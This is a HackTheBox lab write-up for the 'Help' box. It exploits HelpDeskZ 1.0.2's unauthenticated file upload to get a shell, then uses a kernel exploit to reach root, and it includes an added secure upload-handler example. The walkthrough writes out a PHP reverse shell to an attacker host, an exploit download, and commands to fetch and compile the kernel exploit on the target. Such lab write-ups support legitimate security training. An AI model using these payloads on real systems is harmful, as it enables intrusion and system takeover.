HackTheBox - Help
| Field | Details |
|---|---|
| OS | Linux |
| Difficulty | Easy |
| Release Date | 2019-01-19 |
| Pwned Date | 2026-05-19 |
| Tags | File Upload Vulnerability, CVE-2017-16995, HelpDeskZ, ffuf |
Summary
Help is an Easy Linux box with an unauthenticated arbitrary file upload that can be exploited to get RCE. The kernel is then found to be vulnerable to a local privilege escalation, which is exploited to get a root shell.
Reconnaissance
Start with a general sweep of all TCP ports
nmap -p- --min-rate 5000 -oN all_tcp_ports.txt TARGET_IP
[snip]
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
[snip]
Run a more targeted service scan on detected ports
nmap -sC -sV -p 22,80,3000 -oN service_scan.txt TARGET_IP
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://help.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Notice the Apache server running on port 80. Browsing directly to TARGET_IP redirects to the help.htb domain. Add the following line to the /etc/hosts file so the domain resolves correctly:
TARGET_IP help.htb
Browsing to http://help.htb shows the default Apache ‘It works’ page. Directory enumeration discloses additional paths:
ffuf -u http://help.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
[snip]
support [Status: 301, Size: 306, Words: 20, Lines: 10, Duration: 24ms]
[snip]
http://help.htb/support/ presents a help desk web application named HelpDeskZ. Browsing to http://help.htb/support/README.md discloses the installed version:
Version: 1.0.2 from 1st June 2015
Looking for the README.md file is not a random decision. The logic is this: since HelpDeskZ is open source, find its GitHub repository (https://github.com/helpdesk-z/helpdeskz-dev) and search it for files that contain version information. Then check whether those files are reachable on the installed instance. In this case the README.md file contains the version AND is served by the target installation.
HelpDeskZ v1.0.2 has a known arbitrary file upload vulnerability. See https://www.exploit-db.com/exploits/40300 for more information.
This vulnerability allows uploading and triggering a PHP reverse shell on the target, which gives user-level access.
Foothold
Create a ‘reverse.php’ file with the following content
<?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/9001 0>&1'"); ?>
The reverse shell will be uploaded through the ‘Submit a Ticket’ feature of the app, which is available to unauthenticated users.
Before doing the upload, it is useful to understand how the exploit works.
The app verifies the attachments uploaded by the user: any PHP file is rejected and the user is notified with a ‘File not allowed’ type of message. The issue is that the file is moved into place on the server before the verification takes place, and the uploaded file is renamed to an MD5 hash. Even if the file is later rejected, it remains on the machine. Because the MD5 name depends on the time of upload, the exploit guesses the file name with multiple attempts in order to trigger it. For this reason the exploit is time-sensitive and should be run immediately after the upload.
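The fix for the ordering flaw just described, as an added example written in PHP and not HelpDeskZ's own code: validate the attachment fully before anything leaves PHP's temporary upload area, and store only what passes, under a random name. It assumes an upload directory outside the web root; the `storeAttachment` name and the `/var/lib/helpdesk/uploads` path are placeholders.

```php
<?php
// Added example (not HelpDeskZ's own code): an attachment handler that
// validates first and moves second. Assumes the caller passes one entry of
// $_FILES and an upload directory the web server does not serve or execute.

declare(strict_types=1);

// Extension allowlist, each paired with the MIME type we accept for it.
const ALLOWED_TYPES = [
    'png' => 'image/png',
    'jpg' => 'image/jpeg',
    'pdf' => 'application/pdf',
    'txt' => 'text/plain',
];
const MAX_BYTES = 2 * 1024 * 1024;

/**
 * Validate an uploaded attachment and, only if every check passes, move it
 * into $uploadDir under an unpredictable name. Returns the stored file name.
 * A rejected upload is never moved, so PHP discards the temp file when the
 * request ends; nothing lingers on disk for an attacker to trigger.
 */
function storeAttachment(array $file, string $uploadDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed: error ' . $file['error']);
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Name check: extension from the client-supplied name, lower-cased.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException('file type not allowed');
    }
    // Content check: sniff the real MIME type of the temp file, not the name.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException("content ($mime) does not match .$ext");
    }
    // Random name: nothing derivable from the upload time, unlike an MD5 of it.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $stored;
    // move_uploaded_file() also refuses paths that were not HTTP uploads.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store attachment');
    }
    chmod($dest, 0640);   // readable by the app, never executable
    return $stored;
}

// Usage inside the ticket-submission request handler (placeholder path):
// $name = storeAttachment($_FILES['attachment'], '/var/lib/helpdesk/uploads');
```

Serve stored attachments back through a download script that sets Content-Disposition, not by a direct URL into the upload directory, so an accepted file can never be executed by the web server.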
Get the exploit and make it executable
curl -o helpdeskz_exploit.py https://www.exploit-db.com/download/40300
chmod 770 helpdeskz_exploit.py
Listen on attacking machine for incoming connections
nc -lnvp 9001
Upload the reverse.php file and quickly run
python2 helpdeskz_exploit.py http://help.htb/support/uploads/tickets/ reverse.php
A connection should be established on port 9001:
listening on [any] 9001 ...
connect to [10.10.14.50] from (UNKNOWN) [10.129.230.159] 42270
bash: cannot set terminal process group (733): Inappropriate ioctl for device
bash: no job control in this shell
help@help:/var/www/html/support/uploads/tickets$
This gives a shell on the target as the ‘help’ user.
Privilege Escalation
Look at the kernel version
uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Kernel version 4.4.0-116 is vulnerable to local privilege escalation. See https://www.exploit-db.com/exploits/44298 for more information.
Retrieve the exploit code using searchsploit
searchsploit -m 44298
This command will copy the exploit file 44298.c to the current working directory.
The exploit will be compiled directly on the target for maximum compatibility.
Run a python server from the directory where the exploit file is located
python -m http.server
Fetch the 44298.c file on the target machine
wget http://YOUR_IP:8000/44298.c
Build the exploit
gcc 44298.c -o exploit
Run the exploit
./exploit
The exploit spawns a shell without a proper prompt, but with root privileges:
./exploit
whoami
root
Got root access.
Note: this box also has a GraphQL endpoint (port 3000) which can be enumerated to obtain a set of credentials for the HelpDeskZ application. The application is vulnerable to blind SQL injection, which can be exploited to recover a password for SSH login. That vulnerability requires authenticated access, hence the credentials. This writeup took the ‘unauthenticated’ route.